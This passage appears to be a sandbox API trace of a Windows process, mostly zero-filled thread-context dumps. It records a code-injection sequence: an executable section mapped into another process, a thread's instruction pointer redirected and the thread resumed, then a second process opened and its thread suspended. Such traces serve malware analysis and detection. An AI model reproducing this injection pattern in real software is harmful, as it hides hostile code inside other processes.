[41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x494000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x7561895c, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0140.984] NtCreateSection (in: SectionHandle=0xde6ec, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0xde6ac, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0xde6ec*=0x1a8) returned 0x0 [0140.984] NtMapViewOfSection (in: SectionHandle=0x1a8, ProcessHandle=0xffffffff, BaseAddress=0xde6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6ac*=0x186200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f4*=0x75d0000, SectionOffset=0x0, ViewSize=0xde6ac*=0x187000) returned 0x0 [0140.995] NtMapViewOfSection (in: SectionHandle=0x1a8, ProcessHandle=0x1a4, BaseAddress=0xde6f0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6e8*=0x186200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f0*=0x600000, SectionOffset=0x0, ViewSize=0xde6e8*=0x187000) returned 0x0 [0141.025] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x75d0000) returned 0x0 [0141.037] NtClose (Handle=0x1a8) returned 0x0 [0141.037] NtSetContextThread (ThreadHandle=0x1a0, Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x494000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x6f3717, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0141.039] NtResumeThread (in: ThreadHandle=0x1a0, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0141.040] NtClose (Handle=0x1a4) returned 0x0 [0141.040] NtClose (Handle=0x1a0) returned 0x0 [0141.041] NtOpenProcess (in: ProcessHandle=0xdea70, DesiredAccess=0x438, ObjectAttributes=0xdea38*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xdea50*(UniqueProcess=0x120c, UniqueThread=0x0) | out: ProcessHandle=0xdea70*=0x1a0) returned 0x0 [0141.041] NtQueryInformationProcess (in: ProcessHandle=0x1a0, ProcessInformationClass=0x1a, ProcessInformation=0xdea60, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0xdea60, ReturnLength=0x0) returned 0x0 [0141.042] NtQueryInformationProcess (in: ProcessHandle=0x1a0, ProcessInformationClass=0x0, ProcessInformation=0xde6e4, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0xde6e4, ReturnLength=0x0) returned 0x0 [0141.042] NtReadVirtualMemory (in: ProcessHandle=0x1a0, BaseAddress=0x395000, Buffer=0xde9f8, NumberOfBytesToRead=0x20, NumberOfBytesRead=0x0 | out: Buffer=0xde9f8*, NumberOfBytesRead=0x0) returned 0x0 [0141.042] NtDelayExecution (Alertable=0, Interval=0xde6cc*=-50000000) returned 0x0 [0141.044] NtOpenThread (in: ThreadHandle=0xdea64, DesiredAccess=0x1a, ObjectAttributes=0xde6b0, ClientId=0xde6c8*(UniqueProcess=0x0, UniqueThread=0x1210) | out: ThreadHandle=0xdea64*=0x1a4) returned 0x0 [0141.044] NtSuspendThread (in: ThreadHandle=0x1a4, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0141.045] NtMapViewOfSection (in: SectionHandle=0x184, ProcessHandle=0x1a0, BaseAddress=0xde704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0xde704*=0x2070000, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000) returned 0x0 [0141.051] NtGetContextThread (in: ThreadHandle=0x1a4, Context=0xde72c | out: Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x4fff14, Ebx=0x395000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x4ffebc, Eip=0x7561895c, SegCs=0x23, EFlags=0x202, Esp=0x4ffea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, 